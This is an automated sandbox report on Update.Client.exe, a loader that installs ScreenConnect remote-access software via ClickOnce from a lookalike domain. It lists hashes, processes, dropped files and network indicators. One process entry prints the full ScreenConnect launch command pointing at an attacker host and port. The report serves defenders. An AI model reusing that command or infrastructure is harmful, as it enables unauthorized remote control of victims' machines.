File name:

Update.Client.exe

Full analysis: https://app.any.run/tasks/6651a752-df6d-464f-949a-798b10e5f366
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 23, 2025, 04:22:30
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
screenconnect
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

C82B07D77BE6CBC1CD107000A64F05BE

SHA1:

8BC8818ED31F71F8493C33E3B18F341B32D77810

SHA256:

CC074013270A829D25DD8C6D51C77A2B85DD0BF4CD2DA40532CD55745A32885A

SSDEEP:

1536:ohNeDLHPUVkKo2cgigKIhTnH2QjCdqQsWQcdUkBbfqNNK:vDLHcVkKo2cZgKIhTH2U+lU2bfq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 2216)
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 5720)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 5720)
    • Reads the date of Windows installation

      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
    • Reads security settings of Internet Explorer

      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
      • dfsvc.exe (PID: 5720)
    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Creates or modifies Windows services

      • ScreenConnect.ClientService.exe (PID: 2216)
    • SCREENCONNECT mutex has been found

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 2216)
    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Executes application which crashes

      • Update.Client.exe (PID: 3040)
    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 2216)
    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 5720)
    • Checks Windows Trust Settings

      • dfsvc.exe (PID: 5720)
  • INFO

    • Reads the computer name

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
      • ScreenConnect.ClientService.exe (PID: 2216)
    • Reads the machine GUID from the registry

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Checks supported languages

      • Update.Client.exe (PID: 3040)
      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 4444)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • ScreenConnect.WindowsClient.exe (PID: 5092)
    • Disables trace logs

      • dfsvc.exe (PID: 5720)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
      • ScreenConnect.ClientService.exe (PID: 2216)
      • WerFault.exe (PID: 2136)
    • Checks proxy server information

      • dfsvc.exe (PID: 5720)
      • WerFault.exe (PID: 2136)
    • Reads Environment values

      • dfsvc.exe (PID: 5720)
    • Process checks computer location settings

      • dfsvc.exe (PID: 5720)
      • ScreenConnect.WindowsClient.exe (PID: 3812)
    • Reads the software policy settings

      • WerFault.exe (PID: 2136)
      • dfsvc.exe (PID: 5720)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 5720)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 5720)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:10:28 17:41:07+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.39
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x1489
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
125
Monitored processes
8
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start update.client.exe dfsvc.exe screenconnect.windowsclient.exe no specs screenconnect.clientservice.exe #SCREENCONNECT screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs svchost.exe werfault.exe

Process information

PID
CMD
Path
Indicators
Parent process
2136C:\WINDOWS\SysWOW64\WerFault.exe -u -p 3040 -s 324C:\Windows\SysWOW64\WerFault.exe
Update.Client.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2216"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kangs.zapto.org&p=8041&s=b9b61789-b2df-401f-acc8-353cfefd881a&k=BgIAAACkAABSU0ExAAgAAAEAAQBt8GydmSLuUL0rwf9arK5NYD7z7WrABmq8Uzh9zE31Q97LnDTxIZVwBMKTUsuKlLYpBn%2bf6X5fdIbD%2ftv5c%2fvLfwjvbw8EJbtsI40lfM%2fyIZXf4iGQ72nz000p%2fDoWJq0%2fot0u9HnMs7tIP%2b3iM4dIB%2fKqF4ljbFOTUIzo%2by%2f4uNqPdUjUDKkjwIS2RMRnDXymk2UuvwQXBvTx7Az8NN3f2YwOhqorGi%2b5f2RYPQl3FXcl7BQM2TmPkZp324mMjUJjOIMZEzQr%2fWLh6W%2bN5FPaBKOuV3ZZz4TcfKV%2bEwny%2bjRgRDf2%2f7I3CerXq8IdyGdJRk0PW4H8fV1kBmDpTGqh&r=&i=Untitled%20Session" "1"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\msvcrt.dll
3040"C:\Users\admin\Desktop\Update.Client.exe" C:\Users\admin\Desktop\Update.Client.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477
Modules
Images
c:\users\admin\desktop\update.client.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
3812"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exedfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Exit code:
0
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
4444"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kangs.zapto.org&p=8041&s=b9b61789-b2df-401f-acc8-353cfefd881a&k=BgIAAACkAABSU0ExAAgAAAEAAQBt8GydmSLuUL0rwf9arK5NYD7z7WrABmq8Uzh9zE31Q97LnDTxIZVwBMKTUsuKlLYpBn%2bf6X5fdIbD%2ftv5c%2fvLfwjvbw8EJbtsI40lfM%2fyIZXf4iGQ72nz000p%2fDoWJq0%2fot0u9HnMs7tIP%2b3iM4dIB%2fKqF4ljbFOTUIzo%2by%2f4uNqPdUjUDKkjwIS2RMRnDXymk2UuvwQXBvTx7Az8NN3f2YwOhqorGi%2b5f2RYPQl3FXcl7BQM2TmPkZp324mMjUJjOIMZEzQr%2fWLh6W%2bN5FPaBKOuV3ZZz4TcfKV%2bEwny%2bjRgRDf2%2f7I3CerXq8IdyGdJRk0PW4H8fV1kBmDpTGqh&r=&i=Untitled%20Session" "1"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
5092"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exe" "RunRole" "600d648b-1d33-4766-b455-aaf12018652f" "User"C:\Users\admin\AppData\Local\Apps\2.0\R7P2M60V.1YW\9YX6JECA.QQQ\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Version:
24.3.7.9067
Modules
Images
c:\users\admin\appdata\local\apps\2.0\r7p2m60v.1yw\9yx6jeca.qqq\scre..tion_25b0fbb6ef7eb094_0018.0003_23c5350198a4824d\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
5720"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Update.Client.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
14 412
Read events
14 215
Write events
167
Delete events
30

Modification events

(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
YOM6XV3KD35E3DKK0B7HQ5WX
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
YOM6XV3KD35E3DKK0B7HQ5WX
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
R7P2M60V1YW9YX6JECAQQQVL
(PID) Process:(5720) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
MYM9C79XZ986WWHB4C5R45LT
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(5720) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
Executable files
16
Suspicious files
22
Text files
26
Unknown types
0

Dropped files

PID
Process
Filename
Type
5720dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:CB7048D801EE095607C32D274A16B8AE
SHA256:5B4F4CA57B021A3125ADE73F930FD91792236CAE630DC517B2329CFCC3D4050D
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\BVNR8NEQ.5JB\EALZ9X5K.9DO.applicationxml
MD5:85C8AA171EF8213B725157DCE97AF6CD
SHA256:D27D1439C1809AE8EDA24F17C9FF9B50271A54D9F200A6793A406B86182B6552
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsClient.exe.manifestxml
MD5:7F68A01C2FEA1C80A75E287BB36D6B43
SHA256:2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
5720dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:58EEBAF292402C3810E061EF86B72E6B
SHA256:AF286F135E179069F7AFD27238A2BB7E7FEBF502FB64BF678407270D08685DAD
5720dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:DDC076E0C339283564037D69C7823376
SHA256:10C61D67F7CAEE4131FDA65993471667063E13472AB6644B218A7BC90FFD1077
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsBackstageShell.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsBackstageShell.exeexecutable
MD5:AFA97CAF20F3608799E670E9D6253247
SHA256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsFileManager.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.Windows.dllexecutable
MD5:9AD3964BA3AD24C42C567E47F88C82B2
SHA256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
5720dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\YBR6BAMO.8D2\DL8EWAAM.PGD\ScreenConnect.WindowsFileManager.exeexecutable
MD5:1AEE526DC110E24D1399AFFCCD452AB3
SHA256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
19
TCP/UDP connections
24
DNS requests
12
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2144
RUXIMICS.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4504
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2144
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.Client.manifest
unknown
5720
dfsvc.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
5720
dfsvc.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsBackstageShell.exe
unknown
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsFileManager.exe.config
unknown
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsClient.exe.config
unknown
GET
200
51.79.171.167:443
https://wise.screennect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4504
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2144
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5720
dfsvc.exe
51.79.171.167:443
wise.screennect.com
OVH SAS
SG
suspicious
4504
svchost.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2144
RUXIMICS.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2144
RUXIMICS.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 216.58.212.142
whitelisted
wise.screennect.com
  • 51.79.171.167
malicious
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
kangs.zapto.org
  • 51.79.171.167
unknown
watson.events.data.microsoft.com
  • 20.42.73.29
whitelisted
self.events.data.microsoft.com
  • 20.189.173.17
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET INFO Packed Executable Download
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
2192
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.zapto .org
2216
ScreenConnect.ClientService.exe
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
Process
Message
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230